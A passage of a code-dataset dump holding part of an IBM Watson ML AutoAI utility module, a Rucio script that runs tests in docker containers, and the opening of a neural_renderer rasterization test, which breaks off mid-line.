80,\n \"fold_output\": 90,\n \"global_output\": 99,\n # timeseries\n 'after_pipeline_execution': 50,\n 'after_holdout_execution': 80,\n 'after_final_pipelines_generation': 99\n }\n self.total = 100\n self.position = 0\n self.max_position = 5\n\n def get_progress(self, text):\n for i, e in enumerate(self.progress_messages):\n if e in text:\n pos = self.max_position\n self.max_position = max(self.max_position, self.progress_messages[e])\n if pos < self.max_position:\n progress = pos - self.position\n self.position = pos\n return progress\n\n if self.position + 1 >= self.max_position:\n return 0\n else:\n self.position += 1\n return 1\n\n def get_total(self):\n return self.total\n\n\ndef is_ipython():\n \"\"\"Check if code is running in the notebook.\"\"\"\n try:\n name = get_ipython().__class__.__name__\n if name != 'ZMQInteractiveShell':\n return False\n else:\n return True\n\n except Exception:\n return False\n\n\ndef try_import_lale():\n \"\"\"\n Check if lale package is installed in local environment, if not, just download and install it.\n \"\"\"\n lale_version = '0.4.15'\n try:\n try:\n installed_module_version = fallback_to_pip_for_version_check({'name': 'lale'})\n\n except Exception:\n installed_module_version = pkg_resources.get_distribution('lale').version\n\n if version.parse(installed_module_version) < version.parse(lale_version):\n warn(f\"\\\"lale\\\" package version is too low than {lale_version}.\"\n f\"Installing version {lale_version}\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", f\"lale=={lale_version}\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"lale failed to install. Please install it manually.\")\n\n except pkg_resources.DistributionNotFound as e:\n warn(f\"\\\"lale\\\" is not installed.\"\n f\"Installing version {lale_version}\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", f\"lale=={lale_version}\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"lale failed to install. Please install it manually.\")\n\n\ndef try_import_autoai_libs():\n \"\"\"\n Check if autoai_libs package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import autoai_libs\n\n except ImportError:\n warn(f\"\\\"autoai_libs\\\" package is not installed. \"\n f\"This is the needed dependency for pipeline model refinery, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"autoai_libs>=1.11.0\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"autoai_libs>=1.11.0 failed to install. Please install it manually.\")\n\n\ndef try_import_tqdm():\n \"\"\"\n Check if tqdm package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import tqdm\n\n except ImportError:\n warn(f\"\\\"tqdm\\\" package is not installed. \"\n f\"This is the needed dependency for pipeline training, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"tqdm==4.43.0\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"tqdm==4.43.0 failed to install. Please install it manually.\")\n\n\ndef try_import_xlrd():\n \"\"\"\n Check if xlrd package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import xlrd\n\n except ImportError:\n warn(f\"\\\"xlrd\\\" package is not installed. \"\n f\"This is the needed dependency for loading dataset from xls files, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"xlrd==1.2.0\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"xlrd==1.2.0 failed to install. Please install it manually.\")\n\n\ndef try_import_graphviz():\n \"\"\"\n Check if graphviz package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import graphviz\n\n except ImportError:\n warn(f\"\\\"graphviz\\\" package is not installed. \"\n f\"This is the needed dependency for visualizing data join graph, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"graphviz==0.14\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"graphviz==0.14 failed to install. Please install it manually.\")\n\n\ndef try_import_joblib():\n \"\"\"\n Check if joblib is available from scikit-learn or externally and change 'load' method to inform the user about\n compatibility issues.\n \"\"\"\n\n try:\n # note only up to scikit version 0.20.3\n from sklearn.externals import joblib\n\n except ImportError:\n # only for scikit 0.23.*\n import joblib\n\n return joblib\n\n\ndef try_load_dataset(\n buffer: Union['BytesIO', 'BufferedIOBase'],\n sheet_name: str = 0,\n separator: str = ',',\n encoding: Optional[str] = 'utf-8') -> Union['DataFrame', 'OrderedDict']:\n \"\"\"\n Load data into a pandas DataFrame from BytesIO object.\n\n Parameters\n ----------\n buffer: Union['BytesIO', 'BufferedIOBase'], required\n Buffer with bytes data.\n\n sheet_name: str, optional\n Name of the xlsx sheet to read.\n\n separator: str, optional\n csv separator\n\n encoding: str, optional\n\n Returns\n -------\n DataFrame or OrderedDict\n \"\"\"\n from pandas import read_csv, read_excel\n\n try:\n buffer.seek(0)\n data = read_csv(buffer, sep=separator, encoding=encoding)\n\n except Exception as e1:\n try:\n try_import_xlrd()\n buffer.seek(0)\n data = read_excel(buffer, sheet_name=sheet_name)\n\n except Exception as e2:\n raise DataFormatNotSupported(None, reason=f\"Error1: {e1} Error2: {e2}\")\n\n return data\n\n\ndef check_dependencies_versions(request_json: dict, wml_client, estimator_pkg: str) -> bool:\n \"\"\"\n Check packages installed versions and inform the user about needed ones.\n\n Parameters\n ----------\n request_json: dict, required\n Dictionary with request from training saved on user COS or CP4D fs.\n\n wml_client: APIClient, required\n Internal WML client used for sw spec requests.\n\n estimator_pkg: str, required\n Name of the estimator package to check with.\n \"\"\"\n sw_spec_name = request_json.get('hybrid_pipeline_software_specs', [{'name': None}])[-1]['name']\n sw_spec_id = wml_client.software_specifications.get_id_by_name(sw_spec_name)\n sw_spec = wml_client.software_specifications.get_details(sw_spec_id)\n\n packages = sw_spec['entity']['software_specification']['software_configuration']['included_packages']\n\n check_lale = True\n if 'lale' in str(packages):\n check_lale = False\n\n packages_to_check = ['numpy', 'scikit-learn', 'autoai-libs', 'gensim', 'lale']\n\n if estimator_pkg is not None:\n packages_to_check.append(estimator_pkg)\n packages_to_check.append(f'py-{estimator_pkg}')\n\n errored_packages = []\n\n for package in packages:\n if package['name'] in packages_to_check:\n try:\n # note: try to use pip for version check! if failed use pkg_resources\n try:\n installed_module_version = fallback_to_pip_for_version_check(package)\n\n except Exception:\n installed_module_version = pkg_resources.get_distribution(package['name']).version\n\n # workaround for autai-libs and numpy versions in SW spec\n if package['name'] == 'autoai-libs' or package['name'] == 'numpy' or package['name'] == 'lale':\n if version.parse(installed_module_version) < version.parse(package['version']):\n errored_packages.append(package)\n\n else:\n if installed_module_version != package['version']:\n errored_packages.append(package)\n\n except pkg_resources.DistributionNotFound as e:\n errored_packages.append(package)\n\n else:\n pass\n\n if errored_packages:\n raise LibraryNotCompatible(reason=f\"Please check if you have installed correct versions \"\n f\"of the following packages: {errored_packages} \"\n f\"These packages are required to load ML model successfully \"\n f\"on your environment.\")\n\n return check_lale\n\n\ndef prepare_cos_client(\n training_data_references: List['DataConnection'] = None,\n training_result_reference: 'DataConnection' = None) -> Tuple[Union[List[Tuple['DataConnection', 'resource']]],\n Union[Tuple['DataConnection', 'resource'], None]]:\n \"\"\"\n Create COS clients for training data and results.\n\n Parameters\n ----------\n training_data_references: List['DataConnection'], optional\n\n training_result_reference: 'DataConnection', optional\n\n Returns\n -------\n list of COS clients for training data , client for results\n \"\"\"\n from ibm_watson_machine_learning.helpers import S3Connection\n from ibm_boto3 import resource\n from ibm_botocore.client import Config\n\n def differentiate_between_credentials(connection: 'S3Connection') -> 'resource':\n # note: we do not know which version of COS credentials user used during training\n if hasattr(connection, 'auth_endpoint') and hasattr(connection, 'api_key'):\n cos_client = resource(\n service_name='s3',\n ibm_api_key_id=connection.api_key,\n ibm_auth_endpoint=connection.auth_endpoint,\n config=Config(signature_version=\"oauth\"),\n endpoint_url=connection.endpoint_url\n )\n\n else:\n cos_client = resource(\n service_name='s3',\n endpoint_url=connection.endpoint_url,\n aws_access_key_id=connection.access_key_id,\n aws_secret_access_key=connection.secret_access_key\n )\n # --- end note\n\n return cos_client\n\n cos_client_results = None\n data_cos_clients = []\n\n if training_result_reference is not None:\n if (isinstance(training_result_reference.connection, S3Connection) or\n training_result_reference._check_if_connection_asset_is_s3()):\n cos_client_results = (training_result_reference,\n differentiate_between_credentials(connection=training_result_reference.connection))\n\n if training_data_references is not None:\n for reference in training_data_references:\n if isinstance(reference.connection, S3Connection) or reference._check_if_connection_asset_is_s3():\n data_cos_clients.append((reference,\n differentiate_between_credentials(connection=reference.connection)))\n\n return data_cos_clients, cos_client_results\n\n\ndef create_summary(details: dict, scoring: str) -> 'DataFrame':\n \"\"\"\n Creates summary in a form of a pandas.DataFrame of computed pipelines (should be used in remote and local scenario\n with COS).\n\n Parameters\n ----------\n details: dict, required\n Dictionary with all training data\n\n scoring: str, required\n scoring method\n\n Returns\n -------\n pandas.DataFrame with pipelines summary\n \"\"\"\n from pandas import DataFrame\n\n is_ml_metrics = 'ml_metrics' in details['entity']['status'].get('metrics', [{}])[0]\n is_ts_metrics = 'ts_metrics' in details['entity']['status'].get('metrics', [{}])[0]\n\n if not is_ml_metrics and not is_ts_metrics:\n raise NoAvailableMetrics()\n\n def get_metrics_names():\n if is_ml_metrics:\n return details['entity']['status'].get('metrics', [{}])[0].get('ml_metrics', {}).keys()\n elif is_ts_metrics:\n names = list(['validation_' + x for x in details['entity']['status'].get('metrics', [{}])[0].get('ts_metrics', {}).get('training',{}).keys()])\n try:\n holdout_names = list(['holdout_' + y for y in [x for x in details['entity']['status'].get('metrics', [{}]) if 'holdout' in x['ts_metrics']][0]['ts_metrics']['holdout'].keys()])\n except IndexError:\n holdout_names = []\n try:\n backtest_names = list(['backtest_' + y for y in [x for x in details['entity']['status'].get('metrics', [{}]) if 'backtest' in x['ts_metrics']][0]['ts_metrics']['backtest']['avg'].keys()])\n except IndexError:\n backtest_names = []\n\n\n return names + holdout_names + backtest_names\n\n def is_winner(pipeline_name): # ts only\n if is_ts_metrics:\n return len(list([x for x in details['entity']['status'].get('metrics', [{}])\n if x['context']['intermediate_model']['name'] == pipeline_name and 'holdout' in x['ts_metrics']])) > 0\n elif is_ml_metrics:\n return True\n\n if is_ml_metrics:\n columns = ['Pipeline Name', 'Enhancements', 'Estimator']\n elif is_ts_metrics:\n columns = ['Pipeline Name', 'Enhancements', 'Estimator', 'Winner']\n\n columns = (columns +\n [metric_name for metric_name in\n get_metrics_names()])\n values = []\n\n for pipeline in details['entity']['status'].get('metrics', []):\n model_number = pipeline['context']['intermediate_model']['name'].split('P')[-1]\n model_phase = chose_model_output(model_number, is_ml_metrics, is_ts_metrics)\n\n if pipeline['context']['phase'] == model_phase:\n if is_ml_metrics:\n enhancements = []\n steps = pipeline['context']['intermediate_model']['composition_steps']\n\n if any('hpo' in s for s in steps):\n enhancements.append('HPO')\n if 'cognito' in steps:\n enhancements.append('FE')\n if 'Text_FE' in steps:\n enhancements.append('Text_FE')\n\n enhancements = ', '.join(enhancements)\n elif is_ts_metrics:\n enhancements = 'HPO, FE'\n\n def get_metrics_items():\n if is_ml_metrics:\n return pipeline['ml_metrics'].items()\n elif is_ts_metrics:\n def prepare_items(metrics, pipeline_name, metric_name, prefix):\n try:\n chosen_obj = [x for x in metrics if x['context']['intermediate_model']['name'] == pipeline_name and metric_name in x['ts_metrics']][0]\n except Exception as e:\n return []\n\n if metric_name == 'backtest':\n return list({prefix + x: chosen_obj['ts_metrics'][metric_name]['avg'][x] for x in chosen_obj['ts_metrics'][metric_name]['avg']}.items())\n else:\n return list({prefix + x: chosen_obj['ts_metrics'][metric_name][x] for x in chosen_obj['ts_metrics'][metric_name]}.items())\n\n pipeline_name = pipeline['context']['intermediate_model']['name']\n metrics = details['entity']['status'].get('metrics', [])\n training_items = prepare_items(metrics, pipeline_name, 'training', 'validation_')\n holdout_items = prepare_items(metrics, pipeline_name, 'holdout', 'holdout_')\n backtest_items = prepare_items(metrics, pipeline_name, 'backtest', 'backtest_')\n\n return training_items + holdout_items + backtest_items\n\n # note: workaround when some pipelines have less or more metrics computed\n if is_ml_metrics:\n metrics = columns[3:]\n elif is_ts_metrics:\n metrics = columns[4:]\n pipeline_metrics = [None] * len(metrics)\n for metric, value in get_metrics_items():\n for i, metric_name in enumerate(metrics):\n if metric_name == metric:\n pipeline_metrics[i] = value\n # --- end note\n\n if is_ml_metrics:\n values.append(\n ([f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"] +\n [enhancements] +\n [pipeline['context']['intermediate_model']['pipeline_nodes'][-1]] +\n pipeline_metrics\n ))\n elif is_ts_metrics:\n values.append(\n ([f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"] +\n [enhancements] +\n [pipeline['context']['intermediate_model']['pipeline_nodes'][-1]] +\n [is_winner(pipeline['context']['intermediate_model']['name'])] +\n pipeline_metrics\n ))\n\n pipelines = DataFrame(data=values, columns=columns)\n pipelines.drop_duplicates(subset=\"Pipeline Name\", keep='first', inplace=True)\n pipelines.set_index('Pipeline Name', inplace=True)\n\n try:\n if is_ml_metrics:\n pipelines = pipelines.sort_values(\n by=[f\"training_{scoring}\"], ascending=False).rename(\n {\n f\"training_{scoring}\":\n f\"training_{scoring}_(optimized)\"\n }, axis='columns')\n elif is_ts_metrics:\n pipelines = pipelines.sort_values(\n by=['Winner'] + get_metrics_names(), ascending=False)\n\n # note: sometimes backend will not return 'training_' prefix to the metric\n except KeyError:\n pass\n\n # for columns with _neg_ inside name\n neg_columns = [col for col in pipelines if '_neg_' in col]\n pipelines[neg_columns] = pipelines[neg_columns].apply(lambda x: -x if x is not None else x)\n pipelines = pipelines.rename(columns={col: col.replace('_neg_', '_') for col in neg_columns})\n\n # for columns with neg_ on beginning of name\n neg_columns = [col for col in pipelines if col.startswith('neg_')]\n pipelines[neg_columns] = pipelines[neg_columns].apply(lambda x: -x if x is not None else x)\n pipelines = pipelines.rename(columns={col: col[4:] for col in neg_columns})\n\n return pipelines\n\n\ndef get_node_and_runtime_index(node_name: str, optimizer_config: dict) -> Tuple[int, int]:\n \"\"\"Find node index from node name in experiment parameters.\"\"\"\n node_number = None\n runtime_number = None\n\n for i, node in enumerate(optimizer_config['entity']['document']['pipelines'][0]['nodes']):\n if node_name == 'kb' and (node.get('id') == 'kb' or node.get('id') == 'automl'):\n node_number = i\n break\n\n elif node_name == 'obm' and node.get('id') == 'obm':\n node_number = i\n break\n\n for i, runtime in enumerate(optimizer_config['entity']['document']['runtimes']):\n if node_name == 'kb' and (runtime.get('id') == 'kb' or runtime.get('id') == 'automl' or\n runtime.get('id') == 'autoai'):\n runtime_number = i\n break\n\n elif node_name == 'obm' and runtime.get('id') == 'obm':\n runtime_number = i\n break\n\n return node_number, runtime_number\n\n\ndef download_experiment_details_from_file(result_client_and_connection: Tuple['DataConnection', 'resource']) -> dict:\n \"\"\"Try to download training details from user COS.\"\"\"\n\n try:\n file = result_client_and_connection[1].Object(\n result_client_and_connection[0].location.bucket,\n result_client_and_connection[0].location._training_status).get()\n\n details = json.loads(file['Body'].read())\n\n except Exception as e:\n raise CannotDownloadTrainingDetails('', reason=f\"Error: {e}\")\n\n return details\n\n\ndef download_wml_pipeline_details_from_file(result_client_and_connection: Tuple['DataConnection', 'resource']) -> dict:\n \"\"\"Try to download wml pipeline details from user COS.\"\"\"\n\n try:\n path = result_client_and_connection[0].location._model_location.split('model.pickle')[0]\n path = f\"{path}pipeline-model.json\"\n\n file = result_client_and_connection[1].Object(\n result_client_and_connection[0].location.bucket,\n path).get()\n\n details = json.loads(file['Body'].read())\n\n except Exception as e:\n raise CannotDownloadWMLPipelineDetails('', reason=f\"Error: {e}\")\n\n return details\n\n\ndef prepare_model_location_path(model_path: str) -> str:\n \"\"\"\n To be able to get best pipeline after computation we need to change model_location string to global_output.\n \"\"\"\n\n if \"data/automl/\" in model_path:\n path = model_path.split('data/automl/')[0]\n path = f\"{path}data/automl/global_output/\"\n\n else:\n path = model_path.split('data/kb/')[0]\n path = f\"{path}data/kb/global_output/\"\n\n return path\n\n\ndef check_graphviz_binaries(f):\n @wraps(f)\n def _f(*method_args, **method_kwargs):\n from graphviz.backend import ExecutableNotFound\n try:\n output = f(*method_args, **method_kwargs)\n\n except ExecutableNotFound as e:\n raise VisualizationFailed(\n reason=f\"Cannot perform visualization with graphviz. Please make sure that you have Graphviz binaries \"\n f\"installed in your system. Please follow this guide: https://www.graphviz.org/download/\")\n\n return output\n\n return _f\n\n\ndef get_sw_spec_and_type_based_on_sklearn(client: 'APIClient', spec: str) -> Tuple[str, str]:\n \"\"\"Based on user environment and pipeline sw spec, check sklearn version and find apropriate sw spec.\n\n Returns\n -------\n model_type, sw_spec\n \"\"\"\n import sklearn\n\n if '0.20.' in sklearn.__version__ and spec in ['autoai-kb_3.0-py3.6', 'autoai-ts_1.0-py3.6']:\n sw_spec = client.software_specifications.get_id_by_name('autoai-kb_3.0-py3.6')\n model_type = 'scikit-learn_0.20'\n\n elif '0.20.' in sklearn.__version__ and spec not in ['autoai-kb_3.0-py3.6', 'autoai-ts_1.0-py3.6']:\n raise LibraryNotCompatible(reason=\"Your version of scikit-learn is different then trained pipeline. \"\n \"Trained pipeline version: 0.23.* \"\n \"Your version: \" + sklearn.__version__)\n\n elif '0.23.' in sklearn.__version__ and spec in ['autoai-kb_3.1-py3.7', 'autoai-ts_1.0-py3.7']:\n sw_spec = client.software_specifications.get_id_by_name('autoai-kb_3.1-py3.7')\n model_type = 'scikit-learn_0.23'\n\n elif '0.23.' in sklearn.__version__ and spec not in ['autoai-kb_3.1-py3.7', 'autoai-ts_1.0-py3.7']:\n raise LibraryNotCompatible(reason=\"Your version of scikit-learn is different then trained pipeline. \"\n \"Trained pipeline version: 0.20.* \"\n \"Your version: \" + sklearn.__version__)\n\n else:\n raise LibraryNotCompatible(reason=\"Your version of scikit-learn is not supported. Use one of [0.20.*, 0.23.*]\")\n\n return model_type, sw_spec\n\n\ndef validate_additional_params_for_optimizer(params):\n expected_params = [\n 'learning_type', 'positive_label', 'scorer_for_ranking', 'scorers', 'num_folds', 'random_state',\n 'preprocessor_flag', 'preprocessor_hpo_flag', 'preprocessor_hpo_estimator', 'hpo_searcher', 'cv_num_folds',\n 'hpo_d_iter_threshold', 'hpo_c_iter_threshold', 'max_initial_points', 'preprocess_transformer_chain',\n 'daub_ensembles_flag', 'max_num_daub_ensembles', 'run_hpo_after_daub_flag', 'daub_include_only_estimators',\n 'run_cognito_flag', 'cognito_ensembles_flag', 'max_num_cognito_ensembles', 'cognito_display_flag',\n 'run_hpo_after_cognito_flag', 'cognito_kwargs', 'cognito_scorers', 'daub_adaptive_subsampling_max_mem_usage',\n 'daub_adaptive_subsampling_used_mem_ratio_threshold', 'daub_kwargs', 'compute_feature_importances_flag',\n 'compute_feature_importances_options', 'compute_feature_importances_pipeline_options', 'show_status_flag',\n 'status_msg_handler', 'state_max_report_priority', 'msg_max_report_priority', 'cognito_pass_ptype',\n 'hpo_timeout_in_seconds', 'cognito_use_feature_importances_flag', 'cognito_max_iterations',\n 'cognito_max_search_level', 'cognito_transform_names', 'cognito_use_grasspile', 'cognito_subsample',\n 'holdout_param', 'missing_values_reference_list', 'datetime_processing_flag',\n 'datetime_delete_source_columns', 'datetime_processing_options', 'ensemble_pipelines_flag', 'ensemble_tags',\n 'ensemble_comb_method', 'ensemble_selection_flag', 'ensemble_weighted_flag', 'ensemble_corr_sel_method',\n 'ensemble_corr_termination_diff_threshold', 'ensemble_num_best_pipelines', 'ensemble_num_folds',\n 'compute_pipeline_notebooks_flag', 'pipeline_ranking_metric', 'cpus_available', 'wml_status_msg_version',\n 'float32_processing_flag', 'train_remove_missing_target_rows_flag', 'train_sample_rows_test_size',\n 'train_sample_columns_index_list', 'preprocessor_cat_imp_strategy', 'preprocessor_cat_enc_encoding',\n 'preprocessor_num_imp_strategy', 'preprocessor_num_scaler_use_scaler_flag', 'preprocessor_num_scaler_with_mean',\n 'preprocessor_num_scaler_with_std', 'preprocessor_string_compress_type', 'FE_drop_unique_columns_flag',\n 'FE_drop_constant_columns_flag', 'FE_add_frequency_columns_flag', 'FE_add_missing_indicator_columns_flag',\n 'data_provenance', 'target_label_name', 'preprocessor_data_filename', 'cognito_data_filename',\n 'holdout_roc_curve_max_size', 'holdout_reg_pred_obs_max_size', 'max_estimator_n_jobs',\n 'enabled_feature_engineering_as_json', 'fairness_info', 'text_processing', 'word2vec_feature_number',\n '_enable_snapml_estimators'\n ]\n\n for k in params:\n if k not in expected_params:\n raise AdditionalParameterIsUnexpected(k)\n\n\ndef download_request_json(run_params: dict, model_name: str, wml_client) -> dict:\n run_id = run_params['metadata']['id']\n is_ml_metrics = 'ml_metrics' in run_params['entity']['status'].get('metrics')[-1]\n is_ts_metrics = 'ts_metrics' in run_params['entity']['status'].get('metrics')[-1]\n\n if not is_ml_metrics and not is_ts_metrics:\n raise NoAvailableMetrics()\n\n pipeline_info = run_params['entity']['status'].get('metrics')[-1]\n schema_path = f\"{pipeline_info['context']['intermediate_model']['schema_location']}\"\n if is_ml_metrics:\n model_number = model_name.split('_')[-1]\n model_output = chose_model_output(model_number)\n elif is_ts_metrics:\n model_number = pipeline_info['context']['intermediate_model']['name'][1:]\n model_output = 'after_final_pipelines_generation'\n request_path = f\"{schema_path.split('/data/')[0]}/assets/{run_id}_P{model_number}_{model_output}/resources/wml_model/request.json\"\n\n if wml_client.ICP:\n request_str = load_file_from_file_system(wml_client=wml_client, file_path=request_path).read().decode()\n # note: only if there was 1 estimator during training\n if 'content_location' not in request_str:\n request_path = f\"{schema_path.split('/data/')[0]}/assets/{run_id}_P{model_number}_compose_model_type_output/resources/wml_model/request.json\"\n request_str = load_file_from_file_system(wml_client=wml_client, file_path=request_path).read().decode()\n\n else:\n cos_client = init_cos_client(run_params['entity']['results_reference']['connection'])\n bucket = run_params['entity']['results_reference']['location']['bucket']\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n # note: only if there was 1 estimator during training\n if 'content_location' not in request_str:\n request_path = f\"{schema_path.split('/data/')[0]}/assets/{run_id}_P{model_number}_compose_model_type_output/resources/wml_model/request.json\"\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n request_json: Dict[str, dict] = json.loads(request_str)\n\n return request_json\n\n\ndef is_list_composed_from_enum(sequence: List[Union[str, enum.Enum]],\n enum_class: Union[object, enum.EnumMeta]\n ) -> None:\n \"\"\"\n Check if all the elements of a given sequence are values of a given enum class.\n\n Parameters\n ----------\n sequence: List[Union[str, enum.Enum]\n Sequence of elements.\n enum_class: Union[object, enum.EnumMeta]\n Class for which validation will be performed.\n It can be a class inheriting from enum.Enum or class which only contains\n attributes.\n\n Raises\n -------\n InvalidSequenceValue, If element is not from enum class values.\n \"\"\"\n if sequence is not None:\n if isinstance(enum_class, enum.EnumMeta):\n enum_values = [e.value for e in enum_class]\n else:\n attributes = inspect.getmembers(enum_class, lambda attr: not (inspect.isroutine(attr)))\n enum_values = [attr_val for attr_name, attr_val in attributes\n if not(attr_name.startswith('__') and attr_name.endswith('__'))]\n\n for el in sequence:\n el_value = el.value if isinstance(el, enum.Enum) else el\n if el_value not in enum_values:\n if f\"{el_value}Estimator\" not in enum_values:\n raise InvalidSequenceValue(el, enum_values)\n\n\ndef validate_optimizer_enum_values(\n prediction_type: str,\n daub_include_only_estimators: List[Union[ClassificationAlgorithms,\n RegressionAlgorithms,\n ForecastingAlgorithms]],\n include_only_estimators: List[Union[ClassificationAlgorithms,\n RegressionAlgorithms,\n ForecastingAlgorithms]],\n cognito_transform_names: List[Transformers],\n scoring: str,\n t_shirt_size: str) -> None:\n \"\"\"\n Validate if passed optimizer variables takes values from defined enums.\n\n Parameters\n ----------\n prediction_type: str\n Type of the prediction.\n daub_include_only_estimators: list\n List of estimators.\n include_only_estimators: list\n List of estimators.\n cognito_transform_names: list\n List of transformers.\n scoring: str\n Type of the metric to optimize with.\n t_shirt_size: str\n The size of the remote AutoAI POD instance.\n\n Raises\n ------\n InvalidSequenceValue, If element is not from enum class values.\n \"\"\"\n if prediction_type == PredictionType.REGRESSION:\n estimators_enum = RegressionAlgorithms\n elif prediction_type == PredictionType.FORECASTING:\n estimators_enum = ForecastingAlgorithms\n else:\n estimators_enum = ClassificationAlgorithms\n for (sequence, enum_class) in (\n ([prediction_type], PredictionType),\n (daub_include_only_estimators, estimators_enum),\n (include_only_estimators, estimators_enum),\n (cognito_transform_names, Transformers),\n ([t_shirt_size], TShirtSize)):\n is_list_composed_from_enum(sequence, enum_class)\n\n # Note: scoring can be None or have one of values from Metrics enum.\n if scoring is not None:\n is_list_composed_from_enum([scoring], Metrics)\n\n\ndef fallback_to_pip_for_version_check(package: dict) -> str:\n \"\"\"Use only when you need to check package version by package name with pip.\"\"\"\n try:\n from pip._internal.utils.misc import get_installed_distributions\n packages = get_installed_distributions()\n installed_module_version = None\n for pkg in packages:\n if pkg.key == package['name']:\n installed_module_version = pkg._version\n break\n\n if installed_module_version is None:\n raise pkg_resources.DistributionNotFound()\n\n else:\n return installed_module_version\n\n except Exception:\n raise pkg_resources.DistributionNotFound()\n","sub_path":"venv/Lib/site-packages/ibm_watson_machine_learning/utils/autoai/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":63565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"34467979","text":"#!/usr/bin/env python3\n# Copyright 2020 CERN for the benefit of the ATLAS collaboration.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Authors:\n# - Benedikt Ziemons , 2020\n\nimport itertools\nimport json\nimport os\nimport subprocess\nimport sys\nimport typing\n\n\ndef matches(small: typing.Dict, group: typing.Dict):\n for key in small.keys():\n if key not in group or small[key] != group[key]:\n return False\n return True\n\n\ndef run(*args, env=None):\n print(\"** Running\", \" \".join(args), file=sys.stderr, flush=True)\n if env is None:\n subprocess.run(args, check=True, stdout=sys.stderr, stderr=subprocess.STDOUT)\n else:\n subprocess.run(args, check=True, stdout=sys.stderr, stderr=subprocess.STDOUT, env=env)\n\n\ndef main():\n obj = json.load(sys.stdin)\n cases = (obj[\"matrix\"], ) if isinstance(obj[\"matrix\"], dict) else obj[\"matrix\"]\n\n for case in cases:\n for image, idgroup in obj[\"images\"].items():\n if matches(idgroup, case):\n cid = \"rucio\"\n print(\"*** Starting\", {**case, \"IMAGE\": image}, file=sys.stderr, flush=True)\n docker_env_args = list(itertools.chain(*map(lambda x: ('--env', f'{x[0]}={x[1]}'), case.items())))\n try:\n # Running before_script.sh\n run('./tools/test/before_script.sh', env={**os.environ,\n **case,\n \"DOCKER_PASS_ENV\": ' '.join(docker_env_args),\n \"IMAGE\": image})\n\n # A container named \"rucio\" might have been spawned by before_script\n args = ('docker', 'inspect', '--type', 'container', 'rucio')\n print(\"** Checking for running rucio container\", file=sys.stderr, flush=True)\n proc = subprocess.run(args, stdout=subprocess.PIPE, check=False)\n try:\n rucio_containers = json.loads(proc.stdout)\n except ValueError:\n rucio_containers = []\n\n if len(rucio_containers) == 0 or not rucio_containers[0][\"State\"][\"Running\"]:\n # Running rucio container if not already started\n args = ('docker', 'run', '--detach', *docker_env_args, image)\n print(\"** Running\", \" \".join(args), file=sys.stderr, flush=True)\n proc = subprocess.run(args, stdout=subprocess.PIPE, check=True)\n cid = proc.stdout.decode().strip()\n if not cid:\n raise RuntimeError(\"Could not determine container id after docker run\")\n\n # Running install_script.sh\n run('docker', 'exec', '-t', cid, './tools/test/install_script.sh')\n\n # Running test.sh\n run('docker', 'exec', '-t', cid, './tools/test/test.sh')\n finally:\n print(\"*** Finalizing\", {**case, \"IMAGE\": image}, file=sys.stderr, flush=True)\n\n if cid:\n run('docker', 'stop', cid)\n run('docker', 'rm', '-v', cid)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/test/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"183512094","text":"import unittest\nimport os\nimport math\n\nimport torch\nfrom torch.nn import functional as F\nimport numpy as np\nfrom imageio import imread, imsave\n\nimport neural_renderer as nr\nimport utils\n\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\ndata_dir = os.path.join(current_dir, 'data')\n\n\ndef rotation_from_look_at(position, at=[0, 0, 0], up=[0, 1, 0]):\n \"\"\"\n Gives a position and a rotation from elevation and azimuth parameters\n \"\"\"\n at = torch.tensor(at).float()[None, :]\n position = torch.tensor(position).float()[None, :]\n up = torch.tensor(up).float()[None, :]\n\n z_axis = F.normalize(at - position, eps=1e-5)\n x_axis = F.normalize(torch.cross(up, z_axis), eps=1e-5)\n y_axis = F.normalize(torch.cross(z_axis, x_axis), eps=1e-5)\n\n r = torch.cat((x_axis[:, :], y_axis[:, :], z_axis[:, :]), dim=0)\n\n rotation = r.transpose(1, 0)\n return rotation\n\n\nclass TestRasterize(unittest.TestCase):\n def setUp(self):\n batch_size = 4\n camera_distance = 1 + 1 / math.tan(math.radians(30))\n self.position = torch.tensor([0, 0, camera_distance]).float().reshape(1, 1, 3).expand(batch_size, 1, 3)\n\n def test_forward_case1(self):\n \"\"\"Rendering a teapot without anti-aliasing.\"\"\"\n\n # load teapot\n vertices, faces, textures = utils.load_teapot_batch()\n vertices = 